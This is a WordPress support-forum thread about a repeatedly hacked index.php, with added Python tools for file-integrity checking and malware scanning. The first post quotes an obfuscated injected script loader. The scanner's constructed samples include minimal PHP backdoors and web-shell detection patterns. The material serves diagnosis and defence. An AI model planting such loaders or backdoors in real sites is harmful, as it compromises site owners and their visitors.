
Main index.php constantly being hacked (18 posts)

  1. RobInjection
    Member
    Posted 4 years ago #

    Over the last few weeks, I have had multiple intrusions into my site. Mainly the main index.php in the root WP directory.

    Every few days, I find new malicious code in there. Initially, it was just IFRAMEs, but now I'm seeing this Javascript code in there:

    <script>/*GNU GPL*/ try{window.onload = function(){var Ufxkuzrk298 = document.createElement('script');Ufxkuzrk298.setAttribute('type', 'text/javascript');Ufxkuzrk298.setAttribute('id', 'myscript1');Ufxkuzrk298.setAttribute('src',  'h!@t^t&^#p&:$@/$)#$/@!!a^@l)$)l(&^y@#e(&(!s(^)-#(c$)&&o&m(@#&.)e@$x($!p#$!&e)^^d#(i&#a^.&&@c#o$)m$!).$m#&((a)))k!@&t#)o!#)o&b^(-$c()!&o)!m!&.&)j^a(&c!k^#(f!@#r&(o($s^)@t#$^m@o((v!(#@i(e@@s$^(.^^&&r@u&&)):!8#&^0#)8!0()(^@/)!&!)c(^h(#!i!#$n^@^a$z($.(@^c)$^o##)m@)/(^&c^h))^i#&!@n&#&a$(z!.)!c$o#$m@@$/#$$^g@o)&o^#^g$!l#@##e(.@^&c&&o^m!)&!/&#b#$(e&)s$!@t!)b#$^u(((y(@#.))$c@&o##!^m&!$/@@&5(^^1@&j(!o)!@^b)#.(c#(^#!o)!m)&#/&@&'.replace(/&|\$|#|\!|\(|\)|@|\^/ig, ''));Ufxkuzrk298.setAttribute('defer', 'defer');document.body.appendChild(Ufxkuzrk298);}} catch(e) {}</script>

    I have already made all the initial steps to try to remove this. I have the latest version of WP running, I've changed all my passwords, and this is still happening.

    Does anybody know if there is a way to just lock down the index.php file from being edited? Or a way to track who edits the file so I can block the IP?

    Thanks
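The question above asks how to lock index.php down or track who edits it. Permission bits alone do not hold against an attacker who holds the same FTP credentials as the site owner (they can simply set them back), but a baseline of file hashes taken from a known-clean copy and compared on a schedule from outside the web root does turn "every few days I find new code" into an alert within the hour. The following is an added example written for this thread, not code from the original post or from WordPress; the skip list, the sample file tree and the command-line layout are constructed for illustration.

```python
import hashlib
import json
import os
import sys
import tempfile
from pathlib import Path

# Directories whose contents churn legitimately (constructed defaults; adjust per site).
SKIP_DIRS = ("wp-content/cache", "wp-content/uploads")


def hash_file(path: Path) -> str:
    """SHA-256 of a file, read in chunks so large files are not loaded into memory."""
    h = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def build_baseline(root, skip_dirs=SKIP_DIRS) -> dict:
    """Map every regular file under root (relative POSIX path) to its SHA-256."""
    root = Path(root)
    baseline = {}
    for dirpath, dirnames, filenames in os.walk(root):
        rel_dir = Path(dirpath).relative_to(root).as_posix()
        if any(rel_dir == s or rel_dir.startswith(s + "/") for s in skip_dirs):
            dirnames[:] = []  # do not descend into noisy directories
            continue
        for name in sorted(filenames):
            p = Path(dirpath) / name
            if p.is_file():  # skips dangling symlinks, sockets and the like
                baseline[p.relative_to(root).as_posix()] = hash_file(p)
    return baseline


def compare(baseline: dict, current: dict) -> dict:
    """Report which files changed, appeared, or disappeared since the baseline was taken."""
    return {
        "modified": sorted(k for k in baseline if k in current and baseline[k] != current[k]),
        "added": sorted(k for k in current if k not in baseline),
        "removed": sorted(k for k in baseline if k not in current),
    }


def demo() -> dict:
    """Constructed scenario: a small WP-like tree, then an injected index.php and a dropped file."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "wp-content" / "cache").mkdir(parents=True)
        (root / "index.php").write_text(
            "<?php\ndefine('WP_USE_THEMES', true);\nrequire __DIR__ . '/wp-blog-header.php';\n"
        )
        (root / "wp-config.php").write_text("<?php // constructed placeholder config\n")
        (root / "wp-content" / "cache" / "page.html").write_text("cached page\n")
        baseline = build_baseline(root)

        # Simulate what the thread describes: a script appended to index.php, a new file
        # dropped under wp-content, and the cache regenerating (which must not raise an alert).
        with (root / "index.php").open("a") as f:
            f.write("<script>/* constructed stand-in for the injected script */</script>\n")
        (root / "wp-content" / "x.php").write_text("<?php // unexpected new file\n")
        (root / "wp-content" / "cache" / "page.html").write_text("cache regenerated\n")

        return compare(baseline, build_baseline(root))


if __name__ == "__main__":
    # Usage (store the baseline outside the web root so it cannot be edited via FTP):
    #   python fim.py init  /var/www/site /root/baseline.json
    #   python fim.py check /var/www/site /root/baseline.json   (exit 1 when anything differs)
    mode, site, store = sys.argv[1], Path(sys.argv[2]), Path(sys.argv[3])
    if mode == "init":
        store.write_text(json.dumps(build_baseline(site), indent=1))
    else:
        report = compare(json.loads(store.read_text()), build_baseline(site))
        print(json.dumps(report, indent=1))
        sys.exit(1 if any(report.values()) else 0)
```

Take the baseline only from files you have verified against fresh copies of WordPress, the theme and the plugins; a baseline of an already-infected tree just certifies the infection. Run the check from cron as a user that is not the FTP user, and treat an "added" .php file under wp-content or uploads with the same urgency as a modified index.php.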

  2. @mercime
    Volunteer Moderator
    Posted 4 years ago #

  3. esmi
    Forum Moderator
    Posted 4 years ago #

    Are you sure that you have completely cleaned all files? Most hackers will leave an unobtrusive backdoor somewhere that enables them to regain access to your site. Try working through these resources:

    http://codex.wordpress.org/FAQ_My_site_was_hacked
    http://wordpress.org/support/topic/268083#post-1065779
    http://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/

  4. Terry
    Member
    Posted 4 years ago #

    Do you upload files with an FTP client that stores your site passwords? If so you may have a computer virus that's logging those passwords and sending them to the hacker (I've been through this myself). All you can do is check for viruses on your computer and clean up what you find ASAP. In the meantime, go into your hosting account and change the password (but don't save it in your FTP client). Or contact your web host and have them change your hosting account password until your computer is cleaned up.

    Do a quick check now: Ctrl + Alt + Delete and look up all the processes that are currently running on your computer. That might reveal a keylogger or virus.

  5. RobInjection
    Member
    Posted 4 years ago #

    I run on a Mac, so I'm sure it's not a virus.

    Also, I ran through almost all of those steps, short of reinstalling WordPress cleanly and reimporting everything (which I can't afford to do).

  6. Terry
    Member
    Posted 4 years ago #

    This is very similar to what I experienced; someone mentions Mac users being a commonality among the sites he tried helping (don't know if that's confirming anything though):

    http://wordpress.org/support/topic/281767?replies=38

    More info in there (webservers maybe being hacked, etc.). My problem was the FileZilla + Adobe 8.0 but I understand that it's not solely FileZilla that this thing goes after.

    What do you mean you can't afford to reinstall all wp files? The time that it takes? I'd delete everything and re-upload fresh copies--and double check all file permissions.

    Good luck!

  7. Samuel Wood (Otto)
    Tech Ninja
    Posted 4 years ago #

    I run on a Mac, so I'm sure it's not a virus.

    Hahahahah! Malware and trojans exist for the Mac too. Don't believe the Apple hype.

    That said, are you running on a "shared host"? A lot of the time I see shared hosts get compromised on a different site on the same machine, and then because the host doesn't have proper security, the attacker can run a script that goes and auto-hacks every site it finds on the machine.

    The fact that your "index.php" keeps getting stuff added to it is a good sign of this sort of thing.

    The only real fix: Find a better hosting service.

  8. RobInjection
    Member
    Posted 4 years ago #

    I have a dedicated virtual server, so it's not shared.

    Also, I understand Macs can get trojans, but please believe me when I say I am not a newb and would not be susceptible to this. Also, I run plenty of other WP sites which are not hacked.

    The reason I said I can not afford to do a clean install is because my site is very huge and delicate like a giant elephant haha

    @Terry Thanks for that link. I will try that AntiVirus plugin. Hopefully it will work.

    http://wordpress.org/extend/plugins/antivirus/

  9. ClaytonJames
    Member
    Posted 4 years ago #

  10. ClaytonJames
    Member
    Posted 4 years ago #

  11. Terry
    Member
    Posted 4 years ago #

    Quick question: do you sftp or ftp?

    Can you restrict access to your account so only your ip can gain access? At least until you figure out "how" they're getting in?

  12. RobInjection
    Member
    Posted 4 years ago #

    Thanks for all your responses!

    I tried that remove-virus.php script and it didn't seem to respond, probably because my site is huge.

    I did go through my wp-content folder though, based on @ClaytonJames' recommendation, and found a few old cache folders that I wasn't using that may have contained the virus file. I downloaded the remainder of my wp-content folder and found no trace of the iframe code or the Javascript code.

    Hopefully this does it.

    Also, Terry, I FTP in, and I'm not sure how to restrict it to just my IP. Is it possible to do with Plesk?

  13. johnnykane
    Member
    Posted 4 years ago #

    Hey there. We came across this on one of our client sites. It's pretty much as the lads described above (ftp compromised etc). We've written up a blog on it to help others out.
    http://www.cubedroute.com/weblog/website-virus-removal-and-post-mortem/

  14. ishmate
    Member
    Posted 4 years ago #

    OK, I had the same problem with my installation of WP as well. It's a replicating script. From what I learned, it replicates itself no matter what you do. It has a backdoor programmed in and it affects your files outside of the WP installation as well. There is no definite way to remove it except that you have to do a complete nuke of your public_html folder.

    Take a backup of your MySQL database. The script does not affect it. Then do the nuke, re-install WordPress and simply import your old database files into the new one through the phpMyAdmin utility in cPanel.

    I deduced that this happens owing to security vulnerabilities in other open-source installations. Do you by any chance have Zen-Cart installed on your server? In my case, the script injection attack was through Zen-Cart...

  15. Terry
    Member
    Posted 4 years ago #

    Also, Terry, I FTP in, and I'm not sure how to restrict it to just my IP. Is it possible to do with Plesk?

    I'd suggest switching to sftp since one of my hosts informed me that this gang watches ftp connections to gain server passwords.

    Plesk...sorry but I have no experience with that.

  16. Terry
    Member
    Posted 4 years ago #

    johnnykane, I can't access your page; my antivirus program is screaming that it's an infected website.

  17. kboyko
    Member
    Posted 4 years ago #

    Please check my article about this virus:

    http://justcoded.com/article/gumblar-family-virus-removal-tool/

    It has a script which fixes the issue, and don't forget to change your FTP passwords.

  18. Floridan
    Member
    Posted 4 years ago #

    To the OP: since you are on a Mac and you think you can't be hacked, do not log into your FTP until you find the source of the problem. The hacker is most likely gaining access to your site through your FTP. Even if you use FTP to access other servers, the other server or PC is probably infected with a trojan.

    Also, the hacker has probably placed a php shell script somewhere on your server. You should run a virus scan on the server or ask your host to do it.
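Floridan's point that a PHP shell is probably sitting somewhere on the server, together with the injected loader in the first post, is the kind of thing a content scan catches where a hash comparison (which needs a clean baseline first) cannot. Below is an added example written for this thread, not code from the thread, from WordPress or from any of the linked tools: the signatures are heuristics constructed for it, the sample files are constructed, and the injected-loader sample is a neutralised stand-in whose de-obfuscated string points at a reserved `.invalid` host rather than any real domain.

```python
import os
import re
from pathlib import Path

# Root-level WordPress PHP files that never legitimately carry HTML markup of their own.
CORE_PHP_NO_MARKUP = {"index.php", "wp-config.php", "wp-blog-header.php", "wp-load.php", "wp-settings.php"}
HTML_IN_CORE = re.compile(r"<(script|iframe)\b", re.I)

# Heuristic signatures constructed for this example; every hit needs a human to look at it.
SIGNATURES = [
    # A string literal padded with junk characters that are stripped at runtime, e.g.
    # '...'.replace(/&|\$|#|\!|\(|\)|@|\^/ig, ''): three or more alternations, replaced by nothing.
    ("deobfuscating-replace", re.compile(r"\.replace\(/(?:\\?.\|){3,}\\?./[gi]+,\s*''\)")),
    # eval() fed straight from a decoder: the usual shape of a PHP dropper or backdoor.
    ("eval-of-decoded-payload",
     re.compile(r"\beval\s*\(\s*(base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(", re.I)),
    # Command execution driven directly by request input: a minimal web shell.
    ("request-to-exec",
     re.compile(r"\b(system|exec|shell_exec|passthru|popen|proc_open)\s*\(\s*\$_(GET|POST|REQUEST|COOKIE)\b", re.I)),
]


def scan_text(name: str, text: str) -> list:
    """Return (rule, line_number) findings for one file's contents."""
    findings = []
    core = os.path.basename(name) in CORE_PHP_NO_MARKUP
    for lineno, line in enumerate(text.splitlines(), 1):
        if core and HTML_IN_CORE.search(line):
            findings.append(("html-in-core-php", lineno))
        for rule, rx in SIGNATURES:
            if rx.search(line):
                findings.append((rule, lineno))
    return findings


def scan_tree(root, exts=(".php", ".html", ".htm", ".js")) -> dict:
    """Scan every file with a matching extension under root; keys are paths relative to root."""
    root = Path(root)
    report = {}
    for p in root.rglob("*"):
        if p.is_file() and p.suffix.lower() in exts:
            hits = scan_text(p.name, p.read_text(encoding="utf-8", errors="replace"))
            if hits:
                report[p.relative_to(root).as_posix()] = hits
    return report


def demo() -> dict:
    """Constructed samples: one injected core file, two backdoors, one benign script."""
    samples = {
        "index.php": (
            "<?php\n"
            "define('WP_USE_THEMES', true);\n"
            "require __DIR__ . '/wp-blog-header.php';\n"
            # Neutralised stand-in for the injected loader: same structure, no real host.
            r"<script>try{window.onload=function(){var s=document.createElement('script');"
            r"s.setAttribute('src','h#t#t#p#:#/#/#e#x#a#m#p#l#e#.#i#n#v#a#l#i#d#/#x'"
            r".replace(/&|\$|#|\!|\(|\)|@|\^/ig, ''));document.body.appendChild(s);}}catch(e){}</script>" "\n"
        ),
        "wp-content/uploads/cache.php": "<?php eval(base64_decode($_POST['p'])); ?>\n",
        "wp-content/themes/x/footer.php": "<?php if (isset($_GET['c'])) { system($_GET['c']); } ?>\n",
        # A single, ordinary replace() must not trigger the obfuscation rule.
        "wp-content/plugins/ok/ok.js": "document.title = document.title.replace(/\\s+/g, '');\n",
    }
    return {name: sorted({rule for rule, _ in scan_text(name, text)}) for name, text in samples.items()}


if __name__ == "__main__":
    import sys
    for path, hits in scan_tree(sys.argv[1] if len(sys.argv) > 1 else ".").items():
        for rule, lineno in hits:
            print(f"{path}:{lineno}: {rule}")
```

Point it at the site root and at wp-content separately; a hit in uploads or an old cache folder (where the thread's poster found the leftovers) is far more suspicious than one in a plugin that ships minified JavaScript. The scan finds the visible symptoms, not the cause: as several replies say, the credentials used to reach the server still have to change and the files still have to be replaced with fresh copies.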

Topic Closed

This topic has been closed to new replies.
